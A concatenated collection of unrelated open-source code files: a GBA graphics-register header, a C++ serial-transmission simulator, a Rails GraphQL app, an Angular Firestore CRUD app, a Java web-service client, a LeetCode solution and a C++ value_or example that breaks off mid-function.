10 : 512x512 (64x64 tiles)
11 : 1024x1024 (128x128 tiles)
*/
};
struct REG_BGCNT BG_CNT[4];
u16 *REG_BG0CNT = (u16 *) 0x04000008;
u16 *REG_BG1CNT = (u16 *) 0x0400000A;
u16 *REG_BG2CNT = (u16 *) 0x0400000C;
u16 *REG_BG3CNT = (u16 *) 0x0400000E;
// 0x04000010 - 0x0400001E
/* BGHOFS & BGVOFS */
struct REG_BG_POS {
u32 x_pos : 10;
u32 x_pad : 6;
u32 y_pos : 10;
u32 y_pad : 6;
};
struct REG_BG_POS BG_POS[4];
/* This contains the 2x2 matrix controlling rotation and scaling of rotscale
BGs in video mode 1 and mode 2. Namely BG2 and BG3. Along with other things */
/* |PA PB|
|PC PD| */
// 0x04000020 - 0x04000036
struct REG_BG_ROTSCALE {
s16 BG2_PA; // 0x04000020 - 0x04000026
s16 BG2_PB;
s16 BG2_PC;
s16 BG2_PD;
s32 REG_BG_X; // 0x04000028 - 0x0400002F
s32 REG_BG_Y;
s16 BG3_PA; // 0x04000030 - 0x04000036
s16 BG3_PB;
s16 BG3_PC;
s16 BG3_PD;
s32 BG3_X; // 0x04000038 - 0x0400003C
s32 BG3_Y;
};
extern struct REG_BG_ROTSCALE BG_ROTSCALE;
// 0x04000040 - 0x0400004A
struct WIN_REG_SIZE {
// horizontal length = delta x
u8 win0_x2;
u8 win0_x1;
u8 win1_x2;
u8 win1_x1;
// vertical length = delta y
u8 win0_y2;
u8 win0_y1;
u8 win1_y2;
u8 win1_y1;
};
struct REG_WIN_IN {
u16 BG0_win0 : 1;
u16 BG1_win0 : 1;
u16 BG2_win0 : 1;
u16 BG3_win0 : 1;
u16 oams_win0 : 1;
u16 blend_win0 : 1;
u16 padding_win0 : 2;
u16 BG0_win1 : 1;
u16 BG1_win1 : 1;
u16 BG2_win1 : 1;
u16 BG3_win1 : 1;
u16 oams_win1 : 1;
u16 blend_win1 : 1;
u16 padding_win1 : 2;
};
struct REG_WIN_OUT {
u16 BG0_win0 : 1;
u16 BG1_win0 : 1;
u16 BG2_win0 : 1;
u16 BG3_win0 : 1;
u16 oams_win0 : 1;
u16 blend_win0 : 1;
u16 padding_win0 : 2;
u16 BG0_win1 : 1;
u16 BG1_win1 : 1;
u16 BG2_win1 : 1;
u16 BG3_win1 : 1;
u16 oams_win1 : 1;
u16 blend_win1 : 1;
u16 padding_win1 : 2;
};
extern struct WIN_REG WIN_REG;
// 0x0400004C
struct REG_MOSAIC {
u16 BG_x_len : 4;
u16 BG_y_len : 4;
u16 OAM_x_len : 4;
u16 OAM_y_len : 4;
};
extern struct REG_MOSAIC REG_MOSAIC;
// 0x04000050
struct REG_BLDMOD {
u16 blend_BG0_s : 1;
u16 blend_BG1_s : 1;
u16 blend_BG2_s : 1;
u16 blend_BG3_s : 1;
u16 blend_OAM_s : 1;
u16 blend_backdrop_s : 1; // ???
u16 blend_mode : 2;
u16 blend_BG0_t : 1;
u16 blend_BG1_t : 1;
u16 blend_BG2_t : 1;
u16 blend_BG3_t : 1;
u16 blend_OAM_t : 1;
u16 blend_backdrop_t : 1; // ???
};
extern struct REG_BLD_MOD BLD_MOD;
// 0x04000052
struct REG_COLEV {
u16 coeff_a_source : 5;
u16 coeff_a_padding : 3;
u16 coeff_b_source : 5;
u16 coeff_b_padding :3;
};
// 0x04000054
struct REG_COLEY {
u16 light_dark_multiplier : 5;
u16 padding : 11;
};
void gpu_sync_bg_show(u8);
void gpu_sync_bg_hide(u8);
void bgid_mod_x_offset(u8 bgid, u16 delta, u8 dir);
void bgid_mod_y_offset(u8 bgid, u16 delta, u8 dir);
#endif /* BG_H */
|
6f91eb611edf9072162ea2acc1607bc9e3976ed7
|
[
"Markdown",
"C"
] | 11 |
C
|
EternalCode/mega-evolution-cutscene
|
b0525094f6cee532436e5f6b98feba41896e288e
|
4deefd4fe658247e1929cf9622cdd5426332dec9
|
refs/heads/master
|
<file_sep>#pragma once
#include <iostream>
#include <iomanip>
#include <string>
#include <fstream>
#include <algorithm>
class sync_phys {
public:
/*
Transmits data from inFile to outFile with frames of
64 character data blocks preceded by two SYN characters
All characters transmitted are subject to transmission
errors, at a hard coded 10% chance.
*/
static int transWithErr(std::ifstream& inFile, std::ofstream& outFile);
/*
Transmits data from inFile to outFile with frames of
64 character data blocks preceded by two SYN characters
*/
static int transWithOutErr(std::ifstream& inFile, std::ofstream& outFile);
/*
Receives data from inFile, deconstructs each block,
and outputs ASCII characters to outFile. Catches any
parity errors that might have occured during transmission
by checking the unordered map ASCII_REC, and upon not finding
a corresponding entry, throws and error.
*/
static int receive(std::ifstream& inFile, std::ofstream& outFile);
};<file_sep>#include "stdafx.h"
#include "sync_phys.h"
#include "sync_data.h"
using namespace std;
const std::unordered_map<int, std::string> sync_data::ascii_map::ascii_trans = sync_data::ascii_map::createTransMap();
const std::unordered_map<std::string, int> sync_data::ascii_map::ascii_rec = sync_data::ascii_map::createRecMap();
int sync_phys::transWithErr(ifstream& inFile, ofstream& outFile) {
int fileSize, frameCnt, dataBytesLeft;
const int errChance = 10;
char c = 0;
//Get Filesize
fileSize = sync_data::getFileSize(inFile);
//Break filesize into 64 byte data blocks
frameCnt = fileSize / 64;
//Determine size, if any, of data leftover after full frames
dataBytesLeft = (fileSize % 64);
//Read all full frames
for (int i = 0; i < frameCnt; i++) {
// New block, send SYN twice, length 64.
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(64), errChance);
for (int j = 0; j < 64; j++) {
// Transmit char in binary (as '0' and '1' chars) with odd parity
inFile.get(c);
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(c), errChance);
}
}
//If there are data bytes left after the last full frame
//Write the SYN characters, the size, and then
//Transmit each char in binary (as '0' and '1' chars) with odd parity
if (dataBytesLeft > 0) {
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(22), errChance)
<< sync_data::transError(sync_data::ascii_map::ascii_trans.at(dataBytesLeft), errChance);
while (inFile.get(c)) {
outFile << sync_data::transError(sync_data::ascii_map::ascii_trans.at(c), errChance);
}
}
return 0;
}
int sync_phys::transWithOutErr(ifstream& inFile, ofstream& outFile) {
int fileSize, frameCnt, dataBytesLeft;
char c = 0;
//Get Filesize
fileSize = sync_data::getFileSize(inFile);
//Break filesize into 64 byte data blocks
frameCnt = fileSize / 64;
//Determine size, if any, of data leftover after full frames
dataBytesLeft = (fileSize % 64);
//Read all full frames
for (int i = 0; i < frameCnt; i++) {
// New block, send SYN twice, length 64.
outFile << "011010000110100000000010"; //CHR(22)+CHR(22)+CHR(64)
for (int j = 0; j < 64; j++) {
// Transmit char in binary (as '0' and '1' chars) with odd parity
inFile.get(c);
outFile << sync_data::ascii_map::ascii_trans.at(c);
}
}
//If there are data bytes left after the last full frame
//Write the SYN characters, the size, and then
//Transmit each char in binary (as '0' and '1' chars) with odd parity
if (dataBytesLeft > 0) {
outFile << "0110100001101000" << sync_data::ascii_map::ascii_trans.at(dataBytesLeft); //CHR(22)+CHR(22)+DATA SIZE CHAR
for (int i = 0; i < dataBytesLeft; i++) {
inFile.get(c);
outFile << sync_data::ascii_map::ascii_trans.at(c);
}
}
return 0;
}
int sync_phys::receive(ifstream& inFile, ofstream& outFile) {
int fileSize, frameCnt, dataSize;
char dataChar[8];
const string synChars = "0110100001101000";
sync_data::frameHeader fh;
//Get Filesize
fileSize = sync_data::getFileSize(inFile);
//Break filesize into each full frame
//16 chars (SYN SYN) + 8 chars (length char) + 512 (64*8) data chars = 536 chars
frameCnt = fileSize / 536;
//Determine size, if any, of data leftover after full frames
//Get remainder of division, subtract 16 bytes of SYN SYN, 8 bytes of length char
//dataBytesLeft = (fileSize % 536) - 24;
//Determines if there is a frame with less than 64 data characters, if so, add one to frameCnt
if (fileSize % 536 > 0) frameCnt++;
//Read all full frames
//Check SYN as first two chars
for (int i = 0; i < frameCnt; i++) {
inFile.read((char *)&fh, sizeof(fh));
string strSyn(fh.synChars, fh.synChars + 16);
if (synChars != strSyn) {
cout << "SYN character error detected." << endl;
return 1;
}
string strLen(fh.lenChar, fh.lenChar + 8);
if (sync_data::ascii_map::ascii_rec.find(strLen) != sync_data::ascii_map::ascii_rec.end()) {
dataSize = sync_data::ascii_map::ascii_rec.at(strLen);
}
else {
cout << "Length character error detected." << endl;
return 1;
}
for (int j = 0; j < dataSize; j++) {
inFile.read((char *)&dataChar, sizeof(dataChar));
string strData(dataChar, dataChar + 8);
if (sync_data::ascii_map::ascii_rec.find(strData) != sync_data::ascii_map::ascii_rec.end()) {
outFile << (char)sync_data::ascii_map::ascii_rec.at(strData);
}
else {
cout << "Data character error detected." << endl;
return 1;
}
}
}
return 0;
}<file_sep>#include "stdafx.h"
#include "sync_data.h"
int sync_data::getFileSize(std::ifstream& inFile)
{
int fileSize = 0;
inFile.seekg(0, std::ios::end);
fileSize = inFile.tellg();
inFile.seekg(0, std::ios::beg);
return fileSize;
}
std::string sync_data::transError(std::string s, int errChance)
{
srand((unsigned int)time(NULL));
if ((rand() % 100 + 1) <= errChance) {
s.at(rand() % 8) = (char)((rand() % 2) + '0');
}
return s;
}<file_sep>/********************************************************************************************
* Sync.cpp *
* *
* DESCRIPTION: Simulates synchronous transmission and reception. *
* Options to simulate transmissions errors or not. *
* Input Parameters: Sync <mode> <infile> <outfile> *
* Modes: TE: Transmit(with errors) *
* TN: Transmit(no errors) *
* R: Receive *
* *
* *
* AUTHOR: <NAME> START DATE: 10/4/2017 *
*********************************************************************************************/
#include "stdafx.h"
#include "sync_app.h"
#include "sync_phys.h"
using namespace std;
//Converts a string to all uppercase characters
string upCase(string str) {
transform(str.begin(), str.end(), str.begin(), toupper);
return str;
}
//Checks valid mode
bool validMode(string mode) {
if (mode == "TE" || mode == "TN" || mode == "R") {
return true;
}
else {
cout << "Not a valid mode. Valid modes include: TE, TN, R" << endl;
return false;
}
}
void prompt()
{
cout << "Welcome to Aaron's Synchronous Transmitter/Receiver." << endl;
cout << "Accepted input: Sync <mode> <infile> <outfile>" << endl;
cout << "Modes: TE: Transmits(with errors), TN: Transmits(no errors), R: (Receives)" << endl;
}
int main(int argc, char* argv[]) {
string mode;
ifstream inFile;
ofstream outFile;
if (argc != 4) {
cout << "Incorrect number of arguments supplied." << endl;
prompt();
return EXIT_FAILURE;
}
mode = upCase(argv[1]);
if (!validMode(mode)) {
cout << "Invalid mode.";
prompt();
return EXIT_FAILURE;
}
inFile.open(argv[2], ios::in | ios::binary);
if (!inFile) {
cout << "Can't open input file " << argv[1] << endl;
prompt();
return EXIT_FAILURE;
}
outFile.open(argv[3], ios::out | ios::binary);
if (!outFile) {
cout << "Can't open output file " << argv[2] << endl;
prompt();
return EXIT_FAILURE;
}
if (mode == "TN") {
if (sync_phys::transWithOutErr(inFile, outFile) == 1) return EXIT_FAILURE;
}
else if (mode == "TE") {
if (sync_phys::transWithErr(inFile, outFile) == 1) return EXIT_FAILURE;
}
else if (mode == "R") {
if (sync_phys::receive(inFile, outFile) == 1) return EXIT_FAILURE;
}
inFile.close();
outFile.close();
return EXIT_SUCCESS;
}
|
12b968560054d415488922db33e95a33a75e46d3
|
[
"C++"
] | 4 |
C++
|
amillikin/Sync
|
2838ccd4030ad513eb08a4d37809702632ff2f5e
|
3632e0c7eefd3b7ba40e78ba2db8c2d14f808018
|
refs/heads/master
|
<file_sep># code here!
class School
def initialize(name)
@name = name
@roster = {}
end
def roster
@roster
end
def add_student(s_name, s_grade)
#If grade doesn't exist, make new k-v pair
#If it DOES exist, add to student_arr
if @roster.include?(s_grade)
@roster[s_grade] << s_name
else
#add_student("Person", 10) --> {10 => ["Person"]}
@roster[s_grade] = [s_name]
end
# if @roster.include?(s_grade)
# @roster[s_grade] << s_name
# else
# @roster[s_grade] = [] << s_name
# end
end
def grade(grade)
@roster[grade]
end
def sort
@roster.each do |grade, student_arr| #iterate thru roster hash...
# @roster[grade].sort! #for every grade, sort student arr permanently
@roster[grade].sort!
end
p @roster #return altered roster
end
end
|
2ca3d20765215680214dfd8cfdf3f2fbed21c732
|
[
"Ruby"
] | 1 |
Ruby
|
TimeSmash/school-domain-nyc-web-060319
|
741be5ccbd9b602130322c4b6416573936ba12f2
|
f155bc322d9850bf184a27b30963d2ed95760cf7
|
refs/heads/master
|
<file_sep>require 'rails_helper'
describe 'User Query', type: :request do
include_context 'GraphQL Client'
let(:query) do
<<-GRAPHQL
query {
users {
id,
name,,
}
}
GRAPHQL
end
it 'returns a list of users' do
users_ids = create_list(:user, 2).map(&:id).map(&:to_s)
response = client.execute(query)
users = response.data.users
expect(users.map(&:id)).to contain_exactly(*users_ids)
end
end
<file_sep>FactoryBot.define do
factory :lesson do
description 'cool description'
user
end
end
<file_sep>require 'rails_helper'
describe 'User Mutation', type: :request do
include_context 'GraphQL Client'
name = 'Batman!'
let(:query) do
<<-GRAPHQL
mutation {
addUser(input: { name: "#{name}" }) {
user {
name,
}
}
}
GRAPHQL
end
it 'creates an user' do
response = client.execute(query)
user = response.data.add_user.user
expect(user.name).to eq(name)
end
end
<file_sep>class User < ApplicationRecord
has_many :lessons, :dependent => :destroy
validates :name, presence: true
end
<file_sep>class Users
def self.create!(name)
User.create!(name: name)
end
end
<file_sep>require 'rails_helper'
RSpec.describe User, type: :model do
# Relationships
it { should have_many :lessons }
# Attributes
it { should validate_presence_of :name }
end
<file_sep>class Mutations::AddLesson < Mutations::BaseMutation
argument :description, String, required: true
argument :user_id, ID, required: true
field :lesson, Types::LessonType, null: false
def resolve(description:, user_id:)
{
lesson: Lessons.create!(
description,
user_id,
)
}
end
end
<file_sep>class Types::LessonType < Types::BaseObject
field :id, ID, null: false
field :description, String, null: false
field :user_id, ID, null: false
field :user, Types::UserType, null: false
end
<file_sep>FactoryBot.define do
factory :user do
name 'cool name'
end
end
<file_sep>require 'rails_helper'
RSpec.describe Users, type: :service do
describe "#create!" do
it 'creates a valid User' do
name = 'a cool name'
user = Users.create!(name)
expect(user).to be_a User
end
end
end
<file_sep>require 'rails_helper'
describe 'Lesson Mutation', type: :request do
include_context 'GraphQL Client'
description = 'Turn the batsignal on!'
before do
create(:user)
end
let(:query) do
<<-GRAPHQL
mutation {
addLesson(input: { description: "#{description}", userId: #{User.first.id} }) {
lesson {
description,
user {
name,,
}
}
}
}
GRAPHQL
end
it 'creates a lesson' do
response = client.execute(query)
lesson = response.data.add_lesson.lesson
expect(lesson.description).to eq(description)
end
end
<file_sep>class Types::QueryType < Types::BaseObject
# Add root-level fields here.
# They will be entry points for queries on your schema.
field :lessons, [Types::LessonType], null: false
field :users, [Types::UserType], null: false
def lessons
Lesson.all
end
def users
User.all
end
end
<file_sep>class Types::UserType < Types::BaseObject
field :id, ID, null: false
field :name, String, null: false
field :lessons, [Types::LessonType], null: false
end
<file_sep>class Lessons
def self.create!(description, user_id)
Lesson.create!(
description: description,
user_id: user_id,
)
end
end
<file_sep>class Types::MutationType < Types::BaseObject
field :add_lesson, mutation: Mutations::AddLesson
field :add_user, mutation: Mutations::AddUser
end
<file_sep># README
[](https://circleci.com/gh/kaiomagalhaes/rails-graphql-experiment)
<file_sep># delete current records
User.destroy_all
10.times do
user = User.create!(name: Faker::FunnyName.name)
5.times do
Lesson.create!(description: BetterLorem.w, user: user)
end
end
<file_sep>class Mutations::AddUser < Mutations::BaseMutation
argument :name, String, required: true
field :user, Types::UserType, null: false
def resolve(name:)
{
user: Users.create!(name)
}
end
end
<file_sep>require 'rails_helper'
describe 'Lesson Query', type: :request do
include_context 'GraphQL Client'
let(:query) do
<<-GRAPHQL
query {
lessons {
description,
id,
user {
name,,
}
}
}
GRAPHQL
end
it 'returns a list of lessons' do
lessons_ids = create_list(:lesson, 2).map(&:id).map(&:to_s)
response = client.execute(query)
lessons = response.data.lessons
expect(lessons.map(&:id)).to contain_exactly(*lessons_ids)
end
end
<file_sep>require 'rails_helper'
RSpec.describe Lessons, type: :service do
describe "#create!" do
it 'creates a valid Lesson' do
description = 'a cool description'
user = create(:user)
lesson = Lessons.create!(description, user.id)
expect(lesson).to be_a(Lesson)
end
end
end
<file_sep>require 'graphlient'
RSpec.shared_context "GraphQL Client", shared_context: :metadata do
let(:client) do
Graphlient::Client.new('https://api.example.org/graphql') do |client|
client.http do |h|
h.connection do |c|
c.use Faraday::Adapter::Rack, app
end
end
end
end
end
<file_sep>require 'rails_helper'
RSpec.describe Lesson, type: :model do
# Relationships
it { should belong_to :user }
# Attributes
it { should validate_presence_of :description }
end
|
24df479c107b0d0bc8c98d083c3c7f718bdc2acf
|
[
"Markdown",
"Ruby"
] | 22 |
Ruby
|
kaiomagalhaes/rails-graphql-experiment
|
83e461a111a25ce7d1c5c82b03044714f1fedc17
|
416924d246929d38cd802e6d7c90d5a3127eb021
|
refs/heads/master
|
<repo_name>sumaq/apm-ws-client<file_sep>/src/com/aje/apm/webservices/WSRecuperarDatosClient.java
package com.aje.apm.webservices;
import java.rmi.RemoteException;
import org.apache.axis2.AxisFault;
import com.aje.apm.webservices.WSRecuperarDatosStub.Execute;
import com.aje.apm.webservices.WSRecuperarDatosStub.ExecuteResponse;
public class WSRecuperarDatosClient {
public static void main(String[] args) {
try {
String compania = args[0];
String tableName = args[1];
String wsName = args[2];
String wsParams = args[3];
String xmlRoot = args[4];
String xmlChild = args[5];
// Replace params char separator
wsParams = wsParams.replace("#", "&");
WSRecuperarDatosStub stub = new WSRecuperarDatosStub();
Execute execute = new Execute();
execute.setCompania(compania);
execute.setTableName(tableName);
execute.setWsName(wsName);
execute.setWsParams(wsParams);
execute.setXmlRoot(xmlRoot);
execute.setXmlChild(xmlChild);
ExecuteResponse response = new ExecuteResponse();
response = stub.execute(execute);
System.out.println(response.get_return());
} catch (AxisFault e) {
System.out.println("Axis2 Error: " + e);
e.printStackTrace();
} catch (RemoteException e) {
System.out.println("Remote Error: " + e);
e.printStackTrace();
}
}
}
<file_sep>/README.md
apm-ws-client
==============
A java client for apm-ws web service.
<file_sep>/src/com/aje/apm/test/WSTest.java
package com.aje.apm.test;
import com.aje.apm.webservices.WSCargarDatosClient;
import com.aje.apm.webservices.WSRecuperarDatosClient;
public class WSTest {
public static void main(String[] args) {
// public static WSConnectString wsCon = new WSConnectString();
// wsCon.getServiceRecuperar()
WSRecuperarDatosClient wsRecuperar = new WSRecuperarDatosClient();
String[] paramsRecuperar = { "0004", "tmpAPMTurno2",
"verTurnosCerrados", "companiaID=0004#fecha=2014-10-23",
"turnos", "x" };
wsRecuperar.main(paramsRecuperar);
WSCargarDatosClient wsCargar = new WSCargarDatosClient();
String[] paramsCarga = { "0004",
"USP_APM_SQL_LISTA_PRECIO_SUC '0004','0002'",
"cargarListaPrecioSucursal", "ListaPrecioSucursal",
"LP_SUCURSAL", "LP_SUCURSAL" };
// wsCargar.main(paramsCarga);
}
}
<file_sep>/src/com/aje/common/APMWSConnectString.java
/* Clase : Connection
* Autor : <NAME>
* Revision : 22/06/2013 12:45
* Funcion : Permite obtener la cadena de conexi�n hacia la base de datos APM.
* Se obtiene a partir del archivo config.xml de la carpeta conf del proyecto.
* */
package com.aje.common;
import java.io.IOException;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;
public class APMWSConnectString extends DefaultHandler {
String xmlFileName;
String tmpValue;
String WSName;
String WSUrlServiceRecuperar;
static String WSUrlServiceCargar;
String WSUser;
String WSPassword;
OperatingSystem OS = new OperatingSystem();
Boolean fName;
Boolean fUrlServiceRecuperar;
Boolean fUrlServiceCargar;
Boolean fUser;
Boolean fPassword;
public APMWSConnectString() {
ResourcePath resource = new ResourcePath(this);
// Obtener archivo de carpeta Build o WEB-INF del proyecto
this.xmlFileName = resource.getWEBINFpath() + OS.getOSPathDelimiter()
+ "conf" + OS.getOSPathDelimiter() + "APM_WSConfig.xml"; // Windows
parseDocument();
}
private void parseDocument() {
// parse
SAXParserFactory factory = SAXParserFactory.newInstance();
fName = false;
fUrlServiceRecuperar = false;
fUrlServiceCargar = false;
fUser = false;
fPassword = false;
try {
SAXParser parser = factory.newSAXParser();
parser.parse(this.xmlFileName, this);
} catch (ParserConfigurationException e) {
System.out.println("ParserConfig error: " + e.getMessage());
e.printStackTrace();
} catch (SAXException e) {
System.out.println("SAXException : xml not well formed | "
+ e.getMessage());
e.printStackTrace();
} catch (IOException e) {
System.out.println("IO Error: " + e.getMessage());
e.printStackTrace();
}
}
@Override
public void startElement(String s, String s1, String elementName,
Attributes attributes) throws SAXException {
if (elementName.equalsIgnoreCase("name")) {
fName = true;
}
if (elementName.equalsIgnoreCase("urlServiceRecuperar")) {
fUrlServiceRecuperar = true;
}
if (elementName.equalsIgnoreCase("urlServiceCargar")) {
fUrlServiceCargar = true;
}
if (elementName.equalsIgnoreCase("user")) {
fUser = true;
}
if (elementName.equalsIgnoreCase("password")) {
fPassword = true;
}
}
@Override
public void endElement(String s, String s1, String element)
throws SAXException {
// if end of book element add to list
}
@Override
public void characters(char[] ac, int i, int j) throws SAXException {
if (fName) {
this.setName(new String(ac, i, j));
fName = false;
}
if (fUrlServiceRecuperar) {
this.setUrlServiceRecuperar(new String(ac, i, j));
fUrlServiceRecuperar = false;
}
if (fUrlServiceCargar) {
this.setUrlServiceCargar(new String(ac, i, j));
fUrlServiceCargar = false;
}
if (fUser) {
this.setUser(new String(ac, i, j));
fUser = false;
}
if (fPassword) {
this.setPassword(new String(ac, i, j));
fPassword = false;
}
}
public String getName() {
return WSName;
}
public void setName(String name) {
this.WSName = name;
}
public String getServiceRecuperar() {
return WSUrlServiceRecuperar;
}
public void setUrlServiceRecuperar(String service) {
this.WSUrlServiceRecuperar = service;
}
public static String getServiceCargar() {
return WSUrlServiceCargar;
}
public void setUrlServiceCargar(String service) {
this.WSUrlServiceCargar = service;
}
public String getUser() {
return WSUser;
}
public void setUser(String dataBaseUser) {
this.WSUser = dataBaseUser;
}
public String getPassword() {
return WSPassword;
}
public void setPassword(String dataBasePassword) {
this.WSPassword = dataBasePassword;
}
}
<file_sep>/src/com/aje/apm/webservices/WSCargarDatosClient.java
package com.aje.apm.webservices;
import java.rmi.RemoteException;
import org.apache.axis2.AxisFault;
import com.aje.apm.webservices.WSCargarDatosStub.Execute;
import com.aje.apm.webservices.WSCargarDatosStub.ExecuteResponse;
public class WSCargarDatosClient {
public static void main(String[] args) {
try {
String compania = args[0];
String spName = args[1];
String wsName = args[2];
String wsNameParamList = args[3];
String xmlRoot = args[4];
String xmlElement = args[5];
WSCargarDatosStub stub = new WSCargarDatosStub();
Execute execute = new Execute();
execute.setCompania(compania);
execute.setSpName(spName);
execute.setWsName(wsName);
execute.setWsNameParamList(wsNameParamList);
execute.setXmlElement(xmlRoot);
execute.setXmlRoot(xmlElement);
ExecuteResponse response = new ExecuteResponse();
response = stub.execute(execute);
System.out.println(response.get_return());
} catch (AxisFault e) {
System.out.println("Axis2 Error: " + e.getMessage());
e.printStackTrace();
} catch (RemoteException e) {
System.out.println("Remote Error: " + e.getMessage());
e.printStackTrace();
} catch (Exception e) {
System.out.println("General Error: " + e.getMessage());
e.printStackTrace();
}
}
}
|
4fd9e45438447c1051757a1ae3765c4c94ec7976
|
[
"Markdown",
"Java"
] | 5 |
Java
|
sumaq/apm-ws-client
|
27e3731069ea469c0b0713cb2496c59cbd5e8994
|
dc358b15227de59523fd8610ad1e071119962f16
|
refs/heads/master
|
<repo_name>xxrom/136_single_number<file_sep>/main.py
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
dict = {}
for value in nums:
if value in dict:
dict[value] += 1
else:
dict[value] = 1
for item in dict:
if dict[item] == 1:
return item
|
12c288ac93b704b4762932043d9423decb3e87e0
|
[
"Python"
] | 1 |
Python
|
xxrom/136_single_number
|
093df8781a32dc0e012e05d64d20069e64537847
|
d7d349c1467cc90331f5a4b52b36a72828b84e7d
|
refs/heads/master
|
<repo_name>ingfernandorojas/complete-crud<file_sep>/src/app/services/course.service.ts
import { Injectable } from '@angular/core';
// Firebase
import {
AngularFirestore,
AngularFirestoreCollection,
AngularFirestoreDocument
} from 'angularfire2/firestore';
// Interface
import { courseInterface } from 'src/app/models/courseInterface';
// Observable
import { Observable } from 'rxjs';
// Map
import { map } from 'rxjs/operators';
@Injectable({
providedIn: 'root'
})
export class CourseService {
courseCollection: AngularFirestoreCollection<courseInterface>;
courses: Observable<courseInterface[]>;
courseDoc: AngularFirestoreDocument<courseInterface>;
constructor(public afs: AngularFirestore) {
this.courseCollection = afs.collection<courseInterface>('courses', ref => ref.orderBy('date','desc'));
this.courses = this.courseCollection.snapshotChanges().pipe(
map(actions => actions.map(a => {
const data = a.payload.doc.data() as courseInterface;
const id = a.payload.doc.id;
return { id, ...data };
}))
);
}
getCourses(){
return this.courses;
}
addCourse(coursesInterface: courseInterface){
this.courseCollection.add(coursesInterface);
}
deleteCourse(course: courseInterface){
this.courseDoc = this.afs.doc(`courses/${course.id}`);
this.courseDoc.delete();
}
updateCourse(course: courseInterface){
this.courseDoc = this.afs.doc(`courses/${course.id}`);
this.courseDoc.update(course);
}
}
<file_sep>/src/app/components/add-course/add-course.component.ts
import { Component, OnInit } from '@angular/core';
// Service
import { CourseService } from 'src/app/services/course.service';
// Interface
import { courseInterface } from 'src/app/models/courseInterface';
// Form
import { NgForm } from '@angular/forms/src/directives/ng_form';
@Component({
selector: 'app-add-course',
templateUrl: './add-course.component.html',
styleUrls: ['./add-course.component.css']
})
export class AddCourseComponent implements OnInit {
course: courseInterface = {
name: '',
teacher: '',
price: '',
technology: '',
language: '',
date: 0,
description: ''
};
constructor(private courseService: CourseService) { }
ngOnInit() {
}
onSubmit(form: NgForm){
if(form.valid === true){
const dateNow = Date.now();
this.course.date = dateNow;
this.courseService.addCourse(this.course);
form.resetForm();
}
}
}
<file_sep>/src/app/models/courseInterface.ts
export interface courseInterface {
id?: string;
name?: string;
teacher?: string;
price?: string;
technology?: string;
date?: number;
description?: string;
language?: string;
}<file_sep>/src/app/components/courses/courses.component.ts
import { Component, OnInit } from '@angular/core';
// Interface
import { courseInterface } from 'src/app/models/courseInterface';
// Service
import { CourseService } from 'src/app/services/course.service';
@Component({
selector: 'app-courses',
templateUrl: './courses.component.html',
styleUrls: ['./courses.component.css']
})
export class CoursesComponent implements OnInit {
courseList: courseInterface[];
editState: boolean = false;
courseToEdit: courseInterface;
constructor(
private courseService: CourseService,
) { }
ngOnInit() {
this.courseService.getCourses().subscribe(courses => {
this.courseList = courses;
});
}
editCourse(course: courseInterface){
this.editState = true;
this.courseToEdit = course;
return false;
}
updateCourse(course: courseInterface){
this.courseService.updateCourse(course);
this.clearState();
}
deleteCourse(course: courseInterface){
this.courseService.deleteCourse(course);
this.clearState();
}
clearState(){
this.editState = false;
this.courseToEdit = null;
return false;
}
}<file_sep>/README.md
# Angular
This project was generated with [Angular CLI](https://github.com/angular/angular-cli) version 6.2.2.
## Crear un proyecto en Firebase
Luego un database con el nombre "courses"
Agregar los siguientes campos:
```
date
description
language
name
price
teacher
technology
```
## Clonar el proyecto
``` git clone https://github.com/ingfernandorojas/complete-crud.git ```
## Modificar complete-crud/src/environments/environment.ts
```
FirebaseConfig: {
apiKey: "********************************",
authDomain: "******************************",
databaseURL: "*****************************",
projectId: "********************",
storageBucket: "***************************",
messagingSenderId: "**********************"
}
```
## Instalar paquetes
Dentro de complete-crud/ ejecutar```npm install package.json```
## Mostrar en el navegador
``` ng serve -o ```
|
d122df4df94f6d4266e033d46129610ae075db3f
|
[
"Markdown",
"TypeScript"
] | 5 |
TypeScript
|
ingfernandorojas/complete-crud
|
8dbea735eda79dcb0636a97a23b994c8eef3209a
|
1fbd5d25d917622ad7056ab0e3e872c53684ebe7
|
refs/heads/master
|
<repo_name>codalogic/value_or<file_sep>/value_or_example.cpp
#include "annotate-lite.h"
using namespace annotate_lite;
#include "include/value_or/value_or.h"
using namespace valueor;
#pragma warning( disable:4996 )
#include <cstdio>
#include <fstream>
#include <optional>
void pointer_types()
{
Scenario( "Pointer Types" );
struct BadPointer1 {};
struct BadPointer2 {};
try
{
int i = 0;
int * p_i = value_or<BadPointer1>( &i );
Good( "Exception should not thrown" );
p_i = value_or<BadPointer2>( (int*)0 );
Bad( "Exception should have thrown" );
}
catch( const BadPointer1 & )
{
Bad( "Exception thrown" );
}
catch( const BadPointer2 & )
{
Good( "Exception thrown" );
}
}
void unknown_types()
{
Scenario( "Unknown Types" );
struct BadUnknown {};
try
{
float f = value_or<BadUnknown>( 1.0f );
Bad( "Exception should have thrown" );
}
catch( const BadUnknown & )
{
Good( "Exception thrown" );
}
}
namespace valueor {
template<>
struct value_or_validator< const std::ifstream & >
{
static bool is_valid( const std::ifstream & v ) { return v.is_open(); }
};
}
void fopen_file_types()
{
Scenario( "File Types - fopen" );
struct BadFile1 {};
struct BadFile2 {};
try
{
FILE * fin1 = value_or<BadFile1>( fopen( "value_or_example.cpp", "r" ) );
Good( "Exception not thrown" );
fclose( fin1 );
FILE * fin2 = value_or<BadFile2>( fopen( "Non-existent file", "r" ) );
Bad( "Exception should have thrown" );
}
catch( const BadFile1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadFile2 & )
{
Good( "Exception thrown" );
}
}
void fstream_file_types()
{
Scenario( "File Types - ifstream" );
struct BadFile1 {};
struct BadFile2 {};
try
{
std::ifstream fin1( "value_or_example.cpp" );
value_or<BadFile1>( fin1 );
Good( "Exception not thrown" );
std::ifstream fin2( "non-existent file" );
value_or<BadFile2>( fin2 );
